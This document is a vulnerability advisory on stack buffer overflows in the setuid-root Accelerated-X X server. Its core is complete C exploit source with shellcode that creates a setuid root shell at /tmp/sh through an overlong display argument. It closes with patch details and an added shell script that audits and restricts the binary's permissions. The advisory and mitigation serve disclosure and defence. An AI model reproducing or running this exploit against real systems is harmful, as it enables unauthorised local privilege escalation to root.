COMMAND
Accelerated-X
SYSTEMS AFFECTED
Unices (Linux, FreeBSD, Solaris/x86, SCO)
PROBLEM
The following is based on KSR[T] Advisory #011. Local users can gain
administrative privileges by exploiting multiple buffer overflows
(stack overwrites) in the Accelerated-X X server.
Accelerated-X Server is a commercial X server available from
http://www.xig.com/. By default, the X server is installed setuid
root so that when it is executed by a user it still retains enough
privilege to load drivers, manipulate the display, and log
information. However, due to insufficient bounds checking on
command-line parameters, an attacker can overflow the X server by
specifying a 48-byte display string, or through a long string
passed to the -query command-line parameter. Local users that
can execute the Accelerated-X X server can obtain root privileges.
(KSR[T] would like to thank Chris Evans for pointing out the
-query buffer overflow as well as additional security holes
relating to command line parameters)
Here is the exploit for the Accelerated-X buffer overflow. c0nd0r
checked the '-query' argument and found that it does not
overwrite the return address, so it cannot be exploited that way.
The '-indirect' argument behaves in the same way.
/*
 * SDI linux exploit for Accelerated-X
 * Sekure SDI - Brazilian Information Security Team
 * by c0nd0r <condor@sekure.org>
 *
 * This script will exploit a vulnerability found by the KSR[T] team
 * in the Accelerated-X Xserver [<=5.0].
 *
 * --------------------------------------------------------------------
 * The vulnerable buffer was small so we've changed the usual order to:
 * [garbage][eip][lots nop][shellcode]
 * BTW, I've also changed the code to execute, it will create a setuid
 * shell owned by the superuser at /tmp/sh.
 * --------------------------------------------------------------------
 *
 * Warning: DO NOT USE THIS TOOL FOR ILLICIT ACTIVITIES! We take no
 * responsibility.
 *
 * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
 * marty (NORDO!), vader, fcon, slide, c_orb and
 * specially to my sasazita. Also toxyn.org, pulhas.org,
 * superbofh.org (Phibernet rox) and el8.org.
 *
 * Laughs - lame guys who hacked the senado/planalto.gov.br
 * pay some attention to the site: securityfocus.com (good point).
 * see you at #uground (irc.brasnet.org)
 */
#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>   /* strlen */
#include <unistd.h>   /* execl */

/* generic shellcode: execve("/bin/sh" ...) followed by the command string */
char shellcode[] =
"\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
"\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
"\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
"\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff"
"/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";

int main(int argc, char *argv[])
{
    char buf[1024];
    int x, y, offset = 1000;
    long addr;
    int joe;

    if (argc > 1)
        offset = atoi(argv[1]);

    /* return address: a local stack variable's address plus the offset */
    addr = (long) &joe + offset;

    /* display string: ':' followed by filler up to the saved return address */
    buf[0] = ':';
    for (x = 1; x < 53; x++)
        buf[x] = 'X';

    /* overwrite the saved EIP, little-endian */
    buf[x++] = (addr & 0x000000ff);
    buf[x++] = (addr & 0x0000ff00) >> 8;
    buf[x++] = (addr & 0x00ff0000) >> 16;
    buf[x++] = (addr & 0xff000000) >> 24;

    /* NOP sled, then the shellcode */
    for ( ; x < 500; x++)
        buf[x] = 0x90;
    for (y = 0; y < strlen(shellcode); y++, x++)
        buf[x] = shellcode[y];

    fprintf(stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%lx\n\n",
            offset, addr);

    /* terminate the argument at the end of what was written (the original
       used strlen(buf) here, on a buffer that was not yet terminated) */
    buf[x] = '\0';
    execl("/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);
    /* setenv("EGG", buf, 1); */
    /* system("/bin/sh"); */
    return 0;
}
SOLUTION
For AccelX 5.x: XiG has made a patch available for 5.0.1 which
corrects these and other potential command-line interface security
holes. Users running 5.0.0 have to apply the 5.0.1 patch prior to
applying the 5.0.2 patch. The patch is available at
ftp://ftp.xig.com/pub/updates.
For AccelX 4.x: A patch will be made available shortly. An interim
solution is to use an X server wrapper, or to limit access to the
Xaccel binary via a special group.
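As an added example (not part of the advisory and not XiG's own tooling), the following POSIX shell functions implement the interim measure above: they audit whether a setuid binary such as /usr/X11R6/bin/Xaccel is executable by every local user, and restrict it to one trusted group with mode 4750. The group name "xusers" is an assumption; the path is the one the exploit targets.

```shell
#!/bin/sh
# Added example, not from the advisory or from XiG: audit a setuid binary and,
# where it is exposed to every local user, restrict it to one trusted group.
# The path /usr/X11R6/bin/Xaccel comes from the advisory; the group name
# "xusers" is an assumption.

# Prints "exposed" if the file has the setuid bit and is executable by
# "other", "ok" if not, "missing" if it does not exist. Uses only the
# POSIX ls -l mode string (-rwsr-xr-x), so it runs on any Unix.
audit_setuid_exposure() {
    path=$1
    [ -e "$path" ] || { echo "missing"; return 2; }
    mode=$(ls -ld "$path" | cut -c1-10)
    owner_x=$(printf '%s' "$mode" | cut -c4)   # 's'/'S' means setuid
    other_x=$(printf '%s' "$mode" | cut -c10)  # 'x'/'t' means world-executable
    case "$owner_x$other_x" in
        [sS][xt]) echo "exposed"; return 1 ;;
        *)        echo "ok"; return 0 ;;
    esac
}

# Interim mitigation from the advisory: keep the binary setuid root so the
# X server can still load drivers, but drop all access for "other" so only
# members of the trusted group can run it. chgrp must precede chmod, since
# changing the group of an executable can clear the setuid bit.
restrict_to_group() {
    path=$1
    group=$2
    chgrp "$group" "$path" && chmod 4750 "$path"
}

# Usage: ./xaccel_guard.sh [path] [group]
if [ $# -gt 0 ]; then
    status=$(audit_setuid_exposure "$1")
    echo "$1: $status"
    if [ "$status" = "exposed" ]; then
        restrict_to_group "$1" "${2:-xusers}"
        echo "$1: now $(audit_setuid_exposure "$1")"
    fi
fi
```

Run it as root against the real binary; an X server wrapper that drops privileges is the other option the advisory names and is not covered here.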
The upcoming release of Maximum CDE 2.1 comes with the 5.0.2 X
Server, and is not vulnerable to these attacks.